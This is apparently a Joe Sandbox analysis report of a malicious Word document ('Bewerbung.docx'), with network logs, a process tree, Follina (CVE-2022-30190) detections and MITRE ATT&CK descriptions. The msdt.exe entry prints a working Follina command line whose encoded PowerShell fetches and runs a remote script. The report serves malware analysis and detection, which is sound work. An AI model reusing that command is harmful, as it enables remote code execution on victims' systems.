Sep 19, 2022 15:40:44.511768103 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.596209049 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.642450094 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.642551899 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.642908096 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.689951897 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.690171003 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.690465927 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.690566063 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.722345114 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.770217896 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.770395041 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.819525957 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.819631100 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.819686890 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.866835117 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.866864920 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.867002010 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.867089987 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.935882092 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.936037064 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.943491936 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.990324974 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:48.990521908 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:48.991202116 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.037404060 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.037594080 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.037916899 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.083631992 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.083859921 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.084264994 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.130898952 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.131032944 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.159306049 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206475019 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206527948 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206557989 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206562042 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206585884 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206593990 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206614971 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206620932 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206634045 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206645966 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206660032 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206665039 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206681967 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206690073 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206698895 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.206715107 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.206737041 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.207679033 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.563174963 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.608975887 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.609227896 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.609381914 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.654644966 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.654892921 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.655077934 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.700779915 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.701051950 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.701731920 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.747291088 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.747518063 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.747656107 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.793092012 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.793314934 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.793513060 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.838869095 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.839159012 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.840792894 CEST	49714	30737	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.842441082 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.886332989 CEST	30737	49714	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.887679100 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.887793064 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.935303926 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.935432911 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.935518980 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.981725931 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.981843948 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:49.981980085 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:49.982064009 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:50.067444086 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:54.705502033 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:54.705657959 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:54.711369991 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:54.756901026 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:54.757137060 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:54.757474899 CEST	21	49716	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:54.757539988 CEST	49716	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.229079962 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.274853945 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.275073051 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.322541952 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.322654009 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.322906017 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.368654966 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.368789911 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.368890047 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.373421907 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.436585903 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.436742067 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.442109108 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.490015030 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.490122080 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.490823030 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.537239075 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.537353992 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.537612915 CEST	49718	19868	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.584278107 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.584436893 CEST	49718	19868	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.586107016 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.638009071 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.638113976 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.638288975 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.684463978 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684495926 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684513092 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684530020 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684557915 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684573889 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684587002 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684587002 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.684601068 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684613943 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:58.684623003 CEST	49718	19868	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.684669971 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.684675932 CEST	49718	19868	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.910063028 CEST	49718	19868	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:58.956592083 CEST	19868	49718	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:43.710398912 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:43.710541964 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:41:43.711097002 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:43.711162090 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:41:49.306410074 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:49.306581974 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:41:49.307404041 CEST	21	49713	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:49.307497025 CEST	49713	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:41:49.938441038 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:49.938527107 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:41:49.939285040 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:49.939373970 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:41:58.786429882 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:58.786533117 CEST	49717	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:41:58.787384987 CEST	21	49717	185.27.134.11	192.168.2.4
Sep 19, 2022 15:41:58.787461042 CEST	49717	21	192.168.2.4	185.27.134.11

Target ID:	0
Start time:	15:40:36
Start date:	19/09/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x9e0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	1
Start time:	15:40:42
Start date:	19/09/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase:	0x890000
File size:	466688 bytes
MD5 hash:	EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	2
Start time:	15:40:56
Start date:	19/09/2022
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'W05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdJ1RsczExLFRsczEyJzsgJCgkeCA9IEludm9rZS1XZWJSZXF1ZXN0IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9taWNyb3NvZnR3aW5kb3dzZGVmZW5kZXIvLmNvbS9tYWluL3Bvd2VyLnBzMSAtVXNlQmFzaWNQYXJzaW5nOyBJbnZva2UtRXhwcmVzc2lvbiAkKCR4LkNvbnRlbnQpKTs='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
Imagebase:	0x10f0000
File size:	1508352 bytes
MD5 hash:	7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000002.00000002.612793085.00000000039F0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000002.00000002.612793085.00000000039F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000002.00000002.610336977.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000002.00000002.610336977.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000002.00000002.610475144.0000000003678000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000002.00000002.610430089.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000002.00000002.610430089.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Target ID:	13
Start time:	15:41:37
Start date:	19/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2cyagvwu\2cyagvwu.cmdline
Imagebase:	0xbf0000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Target ID:	14
Start time:	15:41:38
Start date:	19/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A8A.tmp" "c:\Users\user\AppData\Local\Temp\2cyagvwu\CSC8D8C47D5CCF542F2A6978E3AB92620A2.TMP"
Imagebase:	0x10c0000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	15
Start time:	15:41:42
Start date:	19/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ps51w3p\1ps51w3p.cmdline
Imagebase:	0xbf0000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Target ID:	16
Start time:	15:41:44
Start date:	19/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7E41.tmp" "c:\Users\user\AppData\Local\Temp\1ps51w3p\CSCA2F7DC4713240A6A1FCA0F064ADC74.TMP"
Imagebase:	0x10c0000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	18
Start time:	15:41:54
Start date:	19/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ufpm0sbx\ufpm0sbx.cmdline
Imagebase:	0xc30000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bewerbung.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E24EF0C9-A590-42E5-86FE-7CD4853FA5C1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\29896CD7.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7E5730EC.html

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EEF783FD.html

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{64A3FFB2-7704-4056-A38D-43E98D209F95}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{67E04DCA-0F5C-43A4-A30A-1D3E6BF2FA13}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\smartscreen[1].html

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\smartscreen[1].html

C:\Users\user\AppData\Local\Temp\1ps51w3p\1ps51w3p.dll

C:\Users\user\AppData\Local\Temp\1ps51w3p\CSCA2F7DC4713240A6A1FCA0F064ADC74.TMP

C:\Users\user\AppData\Local\Temp\2cyagvwu\2cyagvwu.dll

C:\Users\user\AppData\Local\Temp\2cyagvwu\CSC8D8C47D5CCF542F2A6978E3AB92620A2.TMP

C:\Users\user\AppData\Local\Temp\RES6A8A.tmp

C:\Users\user\AppData\Local\Temp\RES7E41.tmp

C:\Users\user\AppData\Local\Temp\RESAB6C.tmp

C:\Users\user\AppData\Local\Temp\ufpm0sbx\CSCFD12017F98C74F3CA9A85B7B52106DF8.TMP

Windows Analysis Report
Bewerbung.docx

Target ID:	19
Start time:	15:41:55
Start date:	19/09/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAB6C.tmp" "c:\Users\user\AppData\Local\Temp\ufpm0sbx\CSCFD12017F98C74F3CA9A85B7B52106DF8.TMP"
Imagebase:	0x10c0000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre